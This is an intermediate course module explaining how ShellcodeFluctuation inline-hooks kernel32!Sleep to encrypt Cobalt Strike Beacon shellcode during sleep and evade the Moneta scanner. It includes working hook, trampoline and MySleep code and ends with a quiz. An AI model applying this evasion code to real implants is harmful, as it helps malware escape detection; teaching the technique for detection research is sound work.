Difficulty: Intermediate

Module 4: Sleep Function Hooking

How ShellcodeFluctuation intercepts kernel32!Sleep via inline hooking to gain control before and after the implant sleeps.

Module Objective

Understand how inline function hooking works, why ShellcodeFluctuation hooks kernel32!Sleep specifically, the trampoline mechanism for calling the original function, the MySleep handler architecture, and why the hook is temporarily removed during the actual sleep call.

1. Why Hook Sleep?

Cobalt Strike Beacon (and most C2 implants) calls kernel32!Sleep to pause between check-ins. This is the natural interception point for ShellcodeFluctuation because:

Sleep as the Interception Target

Guaranteed to be called: every beacon cycle includes a sleep, so the implant cannot avoid calling it.
Called from within the implant: the call originates from the shellcode's own thread, so the hook fires just as the implant is about to go idle.
Single point of control: one hook gives control over every transition between the active and idle states.
Natural boundary: Sleep marks the exact moment the implant transitions from "doing work" to "waiting", the ideal time to encrypt.
Known function signature: void WINAPI Sleep(DWORD dwMilliseconds) takes a single parameter, making it easy to wrap.

2. Inline Hooking vs IAT Hooking

There are two primary approaches to hooking a Windows API function. ShellcodeFluctuation uses inline hooking:

Method	Mechanism	Pros	Cons
IAT Hooking	Modify the Import Address Table entry for `Sleep` to point to the hook function	No code modification; works with the PE loader	Only affects imports through the hooked module's IAT; does not catch calls from other modules or via `GetProcAddress`
Inline Hooking	Overwrite the first bytes of `kernel32!Sleep` with a JMP to the hook function	Catches ALL calls to Sleep regardless of how they are resolved	Modifies mapped DLL code (triggers copy-on-write); must save original bytes for trampoline

ShellcodeFluctuation uses inline hooking because Cobalt Strike Beacon resolves Sleep dynamically at runtime (via GetProcAddress), so its calls never pass through the host executable's IAT. An IAT hook would never intercept them.
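A toy C++ model makes the difference concrete. It uses no real PE structures: the hypothetical `g_hostIatSleep` pointer stands in for the host executable's IAT slot, and the hypothetical `ResolveExport()` stands in for GetProcAddress, which returns the export's real address rather than anything stored in the host's IAT.

```cpp
#include <cassert>
#include <cstring>

// Toy model only: no real PE structures or Windows APIs are involved.
using SleepFn = void (*)(unsigned);

static int g_realCalls = 0;  // calls that reached the "real" Sleep
static int g_hookCalls = 0;  // calls that reached the hook

void RealSleep(unsigned) { ++g_realCalls; }
void HookSleep(unsigned) { ++g_hookCalls; }

// Host executable's import slot for Sleep, filled in by the "loader".
SleepFn g_hostIatSleep = RealSleep;

// Stand-in for GetProcAddress: returns the export itself,
// never whatever is stored in the host's IAT slot.
SleepFn ResolveExport(const char* name) {
    if (std::strcmp(name, "Sleep") == 0) return RealSleep;
    return nullptr;
}

// IAT hook: swaps only the host's import slot.
void InstallIatHook() { g_hostIatSleep = HookSleep; }

// The host calls through its IAT; an injected implant resolves dynamically.
void HostCallsSleep() { g_hostIatSleep(1000); }
void ImplantCallsSleep() { ResolveExport("Sleep")(1000); }
```

After `InstallIatHook()`, a host call lands in `HookSleep`, but a call made through `ResolveExport()` still reaches `RealSleep`. Patching the function body itself, as an inline hook does, closes that gap.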

3. Inline Hook Mechanics

An inline hook replaces the first instructions of the target function with a jump to the hook handler. The original instructions are preserved in a "trampoline" so the original function can still be called.

// kernel32!Sleep original bytes (x64, illustrative; the actual prologue varies by Windows build):
// 48 89 5C 24 08     mov  [rsp+8], rbx
// 57                 push rdi
// 48 83 EC 40        sub  rsp, 0x40
// ...

// After inline hook installation:
// E9 XX XX XX XX     jmp  MySleep        ; 5-byte relative jump replaces the mov
// 57                 push rdi            ; intact; runs when the trampoline jumps back to Sleep+5
// 48 83 EC 40        sub  rsp, 0x40
// ...
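The rel32 field in the patch is the distance from the end of the 5-byte JMP to the destination. The following sketch computes the patch bytes from plain integer addresses (hypothetical values; nothing is written to memory), which makes the displacement arithmetic easy to check.

```cpp
#include <cassert>
#include <cstdint>

// Encodes "E9 rel32" as it would be written at address `src` to reach `dst`.
// Addresses are plain integers; nothing is patched in memory.
// Returns false when `dst` is outside the signed 32-bit range.
bool EncodeRel32Jmp(uint64_t src, uint64_t dst, uint8_t out[5]) {
    // rel32 is relative to the END of the 5-byte instruction (src + 5)
    int64_t disp = static_cast<int64_t>(dst - (src + 5));
    if (disp < INT32_MIN || disp > INT32_MAX) {
        return false;  // out of reach: an absolute jump is needed instead
    }
    uint32_t rel = static_cast<uint32_t>(static_cast<int32_t>(disp));
    out[0] = 0xE9;
    for (int i = 0; i < 4; ++i) {
        out[1 + i] = static_cast<uint8_t>(rel >> (8 * i));  // little-endian
    }
    return true;
}
```

For example, a JMP at 0x7FF800001000 targeting 0x7FF800002000 encodes as E9 FB 0F 00 00: the 0x1000 distance minus the 5-byte instruction length.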

Hook Installation Steps

Resolve target address: get the address of kernel32!Sleep via GetProcAddress
Save original bytes: copy the first N bytes of the function prologue (enough whole instructions to cover the JMP)
Make writable: VirtualProtect the target page to PAGE_EXECUTE_READWRITE
Write JMP: overwrite the first bytes with a relative or absolute JMP to MySleep
Restore protection: VirtualProtect back to the original protection (normally PAGE_EXECUTE_READ)
Build trampoline: allocate a small code region containing the saved bytes followed by a JMP back to Sleep+N
Flush the instruction cache: call FlushInstructionCache on the patched bytes so the CPU does not run stale code

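// Simplified inline hook installation (sketch). Assumes:
//   - the first HOOK_SIZE bytes of targetFunc are whole instructions with
//     no RIP-relative operands (see "Byte Count Matters" below)
//   - on x64, hookFunc and the trampoline lie within +/- 2 GB of targetFunc
#include <windows.h>
#include <stdint.h>
#include <string.h>

static BOOL FitsRel32(INT64 disp) {
    return disp >= INT32_MIN && disp <= INT32_MAX;
}

BOOL InstallHook(LPVOID targetFunc, LPVOID hookFunc, LPVOID* trampoline) {
    const SIZE_T HOOK_SIZE = 5;  // E9 rel32 JMP is 5 bytes on x86 and x64;
                                 // on x64 its +/- 2 GB reach is the limit
    BYTE* target = (BYTE*)targetFunc;

    // 1. Allocate trampoline (saved bytes + 5-byte JMP back)
    BYTE* tramp = (BYTE*)VirtualAlloc(NULL, 64, MEM_COMMIT | MEM_RESERVE,
                                      PAGE_EXECUTE_READWRITE);
    if (tramp == NULL) return FALSE;

    // rel32 displacements are measured from the END of each 5-byte JMP
    BYTE* jmpBack = tramp + HOOK_SIZE;
    INT64 backDisp = (INT64)((target + HOOK_SIZE) - (jmpBack + 5));
    INT64 hookDisp = (INT64)((BYTE*)hookFunc - (target + 5));
    if (!FitsRel32(backDisp) || !FitsRel32(hookDisp)) {
        VirtualFree(tramp, 0, MEM_RELEASE);  // needs the 14-byte absolute JMP
        return FALSE;
    }

    // 2. Copy original bytes to trampoline
    memcpy(tramp, target, HOOK_SIZE);

    // 3. Append JMP back to targetFunc + HOOK_SIZE
    jmpBack[0] = 0xE9;
    *(INT32*)(jmpBack + 1) = (INT32)backDisp;

    // 4. Write JMP to hookFunc at target, then restore the old protection
    DWORD oldProt;
    if (!VirtualProtect(target, HOOK_SIZE, PAGE_EXECUTE_READWRITE, &oldProt)) {
        VirtualFree(tramp, 0, MEM_RELEASE);
        return FALSE;
    }
    target[0] = 0xE9;
    *(INT32*)(target + 1) = (INT32)hookDisp;
    VirtualProtect(target, HOOK_SIZE, oldProt, &oldProt);

    // 5. Discard any stale prologue bytes the CPU may have cached
    FlushInstructionCache(GetCurrentProcess(), target, HOOK_SIZE);

    *trampoline = tramp;
    return TRUE;
}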
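The trampoline layout can be modelled the same way. This sketch assumes hypothetical addresses for the trampoline and the hooked function and produces the bytes InstallHook writes into the trampoline: the saved prologue followed by an E9 jump back to the first byte after the patch.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Builds [saved prologue bytes][E9 rel32 back to targetAddr + saved.size()]
// without touching memory. `trampAddr` and `targetAddr` are hypothetical
// addresses of the trampoline and the hooked function.
// Returns an empty vector if the jump back is out of rel32 range.
std::vector<uint8_t> BuildTrampoline(const std::vector<uint8_t>& saved,
                                     uint64_t trampAddr, uint64_t targetAddr) {
    std::vector<uint8_t> tramp(saved);                // copied prologue
    uint64_t jmpAt = trampAddr + saved.size();        // where the JMP starts
    uint64_t resume = targetAddr + saved.size();      // first unpatched byte
    int64_t disp = static_cast<int64_t>(resume - (jmpAt + 5));
    if (disp < INT32_MIN || disp > INT32_MAX) return {};
    uint32_t rel = static_cast<uint32_t>(static_cast<int32_t>(disp));
    tramp.push_back(0xE9);
    for (int i = 0; i < 4; ++i) {
        tramp.push_back(static_cast<uint8_t>(rel >> (8 * i)));  // little-endian
    }
    return tramp;
}
```

Using the 5-byte mov from the prologue above, a trampoline 0x10000 bytes below Sleep ends in E9 FB FF 00 00, and calling it runs the mov and then continues at Sleep+5.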

4. The x64 Long-Jump Problem

On x86-64, a 5-byte relative JMP (E9) can only reach addresses within +/- 2 GB of the instruction. Since kernel32.dll and the hook function may be more than 2 GB apart in the 64-bit address space, ShellcodeFluctuation may need to use a longer jump sequence:

// Option 1: Relative JMP (5 bytes) - works if within 2 GB
// E9 [rel32]
// Range: -2,147,483,648 to +2,147,483,647 bytes, measured from the end of the instruction

// Option 2: Absolute indirect JMP (14 bytes) - works anywhere
// FF 25 00 00 00 00     jmp [rip+0]
// XX XX XX XX XX XX XX XX   ; 8-byte absolute address

// Sketch: write this 14-byte absolute JMP when the hook function is
// more than 2 GB from the target. The caller must already have made
// `target` writable and sized the patch to cover whole instructions.
void WriteAbsoluteJmp(BYTE* target, LPVOID destination) {
    // FF 25 00 00 00 00 = jmp qword ptr [rip+0]
    target[0] = 0xFF;
    target[1] = 0x25;
    *(DWORD*)(target + 2) = 0;  // RIP-relative offset = 0
    *(UINT64*)(target + 6) = (UINT64)destination;
    // Total: 14 bytes
}
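Choosing between the two encodings comes down to a range check on the displacement. A minimal sketch, again working on integer addresses rather than live memory; `EncodeJmp` is a hypothetical helper, and its long form follows the FF 25 layout shown above.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Returns the bytes of a jump placed at `src` that reaches `dst`:
// "E9 rel32" (5 bytes) when the displacement fits in a signed 32-bit value,
// otherwise "FF 25 00000000 <abs64>" (14 bytes, jmp qword ptr [rip+0]).
std::vector<uint8_t> EncodeJmp(uint64_t src, uint64_t dst) {
    std::vector<uint8_t> out;
    int64_t disp = static_cast<int64_t>(dst - (src + 5));
    if (disp >= INT32_MIN && disp <= INT32_MAX) {
        uint32_t rel = static_cast<uint32_t>(static_cast<int32_t>(disp));
        out.push_back(0xE9);
        for (int i = 0; i < 4; ++i) out.push_back(static_cast<uint8_t>(rel >> (8 * i)));
    } else {
        out = {0xFF, 0x25, 0x00, 0x00, 0x00, 0x00};  // jmp [rip+0]
        // The 8-byte absolute destination sits right after the instruction.
        for (int i = 0; i < 8; ++i) out.push_back(static_cast<uint8_t>(dst >> (8 * i)));
    }
    return out;
}
```

The trade-off is patch size: the 14-byte form always works, but it overwrites more of the prologue and therefore requires copying more whole instructions into the trampoline.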

Byte Count Matters

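The number of bytes copied to the trampoline must end on an instruction boundary. If the patch covers only part of an instruction, the trampoline ends with a truncated instruction and the jump back lands in the middle of the remainder. A length-disassembler engine (LDE) is typically used to calculate the exact number of bytes to copy so that only complete instructions are moved. Instructions with RIP-relative operands also need their displacements adjusted when they are moved into the trampoline.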
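Once a length-disassembler has reported the length of each leading instruction, the number of bytes to copy is the smallest run of whole instructions that covers the patch. The sketch below takes those lengths as input and does not decode x86 itself; in the usage values, the first three lengths correspond to the prologue in section 3 and the rest are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Given the lengths of the target's first instructions (as an LDE would
// report them), returns how many bytes must be copied so that the patch
// covers only whole instructions. Returns 0 if the supplied instructions
// are too short to cover the patch.
std::size_t BytesToCopy(const std::vector<std::size_t>& insnLengths,
                        std::size_t patchSize) {
    std::size_t total = 0;
    for (std::size_t len : insnLengths) {
        total += len;
        if (total >= patchSize) return total;  // first boundary past the patch
    }
    return 0;
}
```

With lengths {5, 1, 4, 5, 3}, a 5-byte patch copies exactly the 5-byte mov, while a 14-byte absolute JMP needs 15 bytes, because stopping at 14 would split the fourth instruction.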

5. The MySleep Handler

The hook redirects all calls to kernel32!Sleep to ShellcodeFluctuation's MySleep function. This is the heart of the fluctuation mechanism:

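#include <windows.h>

// Global state
LPVOID  g_shellcodeBase = nullptr;
SIZE_T  g_shellcodeSize = 0;
DWORD   g_xorKey = 0;
LPVOID  g_sleepTrampoline = nullptr;  // Trampoline to original Sleep

// Repeating-key XOR helper (signature assumed; defined elsewhere)
void xor32(BYTE* buf, SIZE_T size, DWORD key);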

// The hook handler - called instead of kernel32!Sleep
void WINAPI MySleep(DWORD dwMilliseconds) {
    // Phase 1: ENCRYPT
    // Flip shellcode to writable
    DWORD oldProt;
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_READWRITE, &oldProt);

    // XOR encrypt the shellcode region
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);

    // Phase 2: SLEEP
    // Call original Sleep via trampoline
    typedef void (WINAPI* fnSleep)(DWORD);
    ((fnSleep)g_sleepTrampoline)(dwMilliseconds);

    // Phase 3: DECRYPT
    // XOR decrypt the shellcode region
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);

    // Flip shellcode back to executable
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);
}
// Execution returns to the shellcode, which continues normally
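MySleep relies on xor32 being its own inverse: XOR-ing the region twice with the same key restores it. The helper's body is not shown in this module, so the following is a hypothetical byte-wise version that cycles through the four bytes of the 32-bit key (lowest byte first); the real helper may differ.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical xor32: XORs each byte with one byte of the 32-bit key,
// cycling through the key's four bytes starting with the lowest.
// Applying it twice with the same key restores the original buffer.
void xor32(uint8_t* buf, std::size_t size, uint32_t key) {
    for (std::size_t i = 0; i < size; ++i) {
        buf[i] ^= static_cast<uint8_t>(key >> (8 * (i % 4)));
    }
}
```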

MySleep Execution Flow

Beacon calls Sleep(60000) → JMP to MySleep → Flip to RW + encrypt → Original Sleep() → Decrypt + flip to RX → Return to Beacon
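The ordering in this flow can be checked with a toy model that replaces memory protections and the real Sleep with plain variables and a function pointer. Everything here (`ShellcodeState`, `MySleepModel`, `FakeOriginalSleep`) is hypothetical; the point is that the original Sleep only ever runs while the region is RW and encrypted.

```cpp
#include <cassert>
#include <string>
#include <vector>

// Toy model: protections and encryption are flags, Sleep is a pointer.
enum class Prot { RX, RW };

struct ShellcodeState {
    Prot prot = Prot::RX;
    bool encrypted = false;
};

ShellcodeState g_sc;
std::vector<std::string> g_log;
void (*g_originalSleep)(unsigned) = nullptr;

void FakeOriginalSleep(unsigned ms) {
    // Records whether the region was hidden while "sleeping".
    g_log.push_back(g_sc.prot == Prot::RW && g_sc.encrypted
                        ? "sleep(" + std::to_string(ms) + ") while hidden"
                        : "sleep while exposed");
}

void MySleepModel(unsigned ms) {
    g_sc.prot = Prot::RW;    // flip to RW
    g_sc.encrypted = true;   // encrypt
    g_log.push_back("encrypted");
    g_originalSleep(ms);     // original Sleep
    g_sc.encrypted = false;  // decrypt
    g_sc.prot = Prot::RX;    // flip back to RX
    g_log.push_back("decrypted");
}
```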

6. Why Unhook Before Sleeping

A critical detail in ShellcodeFluctuation's implementation: the inline hook on kernel32!Sleep is temporarily removed before the actual sleep call and reinstalled after waking. This is done to eliminate the "Modified code" IOC in Moneta:

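// Improved MySleep with hook/unhook cycle
// Additional globals, filled in when the hook is installed:
LPVOID g_sleepFunc = nullptr;   // address of kernel32!Sleep
SIZE_T g_hookSize = 0;          // number of patched prologue bytes
BYTE   g_originalBytes[16];     // saved original prologue bytes
BYTE   g_hookBytes[16];         // JMP-to-MySleep patch bytes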
void WINAPI MySleep(DWORD dwMilliseconds) {
    // Phase 1: ENCRYPT
    DWORD oldProt;
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_READWRITE, &oldProt);
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);

    // Phase 1.5: UNHOOK Sleep
    // Restore original bytes to kernel32!Sleep
    DWORD hookProt;
    VirtualProtect(g_sleepFunc, g_hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_sleepFunc, g_originalBytes, g_hookSize);
    VirtualProtect(g_sleepFunc, g_hookSize, hookProt, &hookProt);

    // Phase 2: SLEEP (with clean kernel32)
    Sleep(dwMilliseconds);  // Direct call - no hook in place

    // Phase 3: RE-HOOK Sleep
    VirtualProtect(g_sleepFunc, g_hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_sleepFunc, g_hookBytes, g_hookSize);
    VirtualProtect(g_sleepFunc, g_hookSize, hookProt, &hookProt);

    // Phase 4: DECRYPT
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);
}
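The byte-level effect of the unhook/rehook cycle can be sketched on an ordinary array standing in for the start of kernel32!Sleep. This toy model (hypothetical names, no VirtualProtect, placeholder JMP bytes) shows that the prologue holds its original bytes for the whole duration of the real sleep and is patched again afterwards.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <functional>

// Toy model: a byte array plays the role of the first bytes of Sleep.
constexpr std::size_t kHookSize = 5;
uint8_t g_fakeSleep[kHookSize] = {0x48, 0x89, 0x5C, 0x24, 0x08};  // "original"
uint8_t g_originalBytes[kHookSize];
uint8_t g_hookBytes[kHookSize] = {0xE9, 0x00, 0x00, 0x00, 0x00};  // placeholder JMP

void InstallFakeHook() {
    std::memcpy(g_originalBytes, g_fakeSleep, kHookSize);  // save prologue
    std::memcpy(g_fakeSleep, g_hookBytes, kHookSize);      // write JMP
}

// Mirrors Phases 1.5 to 3 of MySleep: restore, run the real sleep, re-patch.
void SleepCycle(const std::function<void()>& realSleep) {
    std::memcpy(g_fakeSleep, g_originalBytes, kHookSize);  // unhook
    realSleep();                                            // "clean" sleep
    std::memcpy(g_fakeSleep, g_hookBytes, kHookSize);      // rehook
}
```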

Why This Matters

During the sleep window (which makes up almost the entire cycle, so it is where a scan is most likely to land), kernel32!Sleep contains its original, unmodified bytes. Moneta comparing in-memory kernel32 against the on-disk file will find no byte differences. The hook is only present during the brief active window when the implant is executing, the same window that is already too short for reliable scanning.

The Persistent IOC

Even with the unhook/rehook cycle, the copy-on-write page persists. Writing to kernel32's .text section (even temporarily) converts the shared page to a private page. Moneta can detect that kernel32 has private pages in its .text section, even if the content matches the on-disk file. However, the IOC message changes from "Modified code" (suspicious) to a weaker working-set anomaly (less suspicious, as legitimate processes can also cause private pages).
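A toy model separates the two properties a scanner can look at: the page's content and whether it is still shared with the on-disk image mapping. `ImagePage` and `WritePage` are hypothetical; the model simply encodes the assumption described above, that any write makes the page private for the rest of the process's life.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Toy copy-on-write page: content plus a "still shared" flag.
struct ImagePage {
    std::vector<uint8_t> bytes;  // current content
    bool shared = true;          // still backed by the shared image mapping?
};

void WritePage(ImagePage& page, std::size_t offset, const std::vector<uint8_t>& data) {
    page.shared = false;  // the first write gives this process a private copy
    for (std::size_t i = 0; i < data.size(); ++i) page.bytes[offset + i] = data[i];
}
```

Writing the hook and then restoring the original bytes leaves content identical to disk, yet the page stays private, which is exactly the residual signal described above.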

7. Hook/Unhook Timing Window

Understanding the exact timing of when the hook is present vs absent is critical for evaluating the technique's effectiveness:

Phase	Hook Present?	Shellcode State	Duration (example: 60 s sleep)	Scanner Risk
Active execution	Yes	RX + Cleartext	~100 ms	Hook detectable, shellcode scannable (but brief)
MySleep entry	Yes	Transitioning	~microseconds	Minimal
After unhook	No	RW + Encrypted	~60 seconds	Hook bytes absent (private page remains); shellcode encrypted
After rehook	Yes	Transitioning	~microseconds	Minimal
Active execution	Yes	RX + Cleartext	~100 ms	Hook detectable, shellcode scannable (but brief)
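The table's illustrative durations show how small the exposed fraction of each cycle is. A one-line calculation, treating the microsecond transitions as negligible:

```cpp
#include <cassert>

// Fraction of one beacon cycle during which the hook bytes and cleartext
// shellcode are present: active time over total cycle time (both in ms).
double ExposureFraction(double activeMs, double sleepMs) {
    return activeMs / (activeMs + sleepMs);
}
```

With 100 ms of activity per 60 s sleep, the hook and cleartext shellcode are present for about 0.17% of each cycle.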

8. Trampoline vs Direct Call

After unhooking Sleep, the implementation can call Sleep directly rather than through the trampoline. This is a cleaner approach because the trampoline is no longer needed once the original bytes are restored:

// Two approaches to calling original Sleep:

// Approach 1: Via trampoline (used when hook stays in place)
// The trampoline contains:
//   [original bytes from Sleep prologue]
//   [JMP back to Sleep + hookSize]
// This allows calling original Sleep without removing the hook.

// Approach 2: Direct call after unhooking (ShellcodeFluctuation)
// Since we restore original bytes before sleeping:
//   1. Unhook: restore original bytes to kernel32!Sleep
//   2. Call Sleep() directly - it's now unmodified
//   3. Rehook: install JMP bytes again
// Cleaner: no trampoline allocation, no extra executable memory

Approach Comparison

Factor	Trampoline (hook stays)	Unhook/Rehook (ShellcodeFluctuation)
Hook visible during sleep?	Yes — kernel32 modified	No — kernel32 clean
Extra allocation?	Yes — trampoline is executable private memory	No — original function used directly
Complexity	Simpler (one-time setup)	More complex (restore/reinstall per cycle)
Performance	Slightly faster (no patching per cycle)	Slightly slower (two byte patches and four VirtualProtect calls per cycle)
Stealth	Lower — hook always visible	Higher — hook only visible during execution

Knowledge Check

Q1: Why does ShellcodeFluctuation use inline hooking rather than IAT hooking for kernel32!Sleep?

A) IAT hooking is harder to implement

B) Cobalt Strike resolves Sleep via GetProcAddress at runtime, bypassing the IAT

C) Inline hooking is undetectable by all scanners

D) IAT hooking requires kernel-mode access

Q2: Why is the Sleep hook temporarily removed before the actual sleep call?

A) The hook interferes with the Sleep timer

B) Windows requires unhooked functions for proper thread scheduling

C) To eliminate the "Modified code in kernel32" IOC during the long sleep window

D) The hook code would be encrypted along with the shellcode

Q3: What is the purpose of a trampoline in inline hooking?

A) It preserves the overwritten original bytes and jumps back, allowing the original function to be called

B) It encrypts the hook bytes to avoid detection

C) It provides a backup copy of the entire target DLL

D) It implements the XOR encryption algorithm
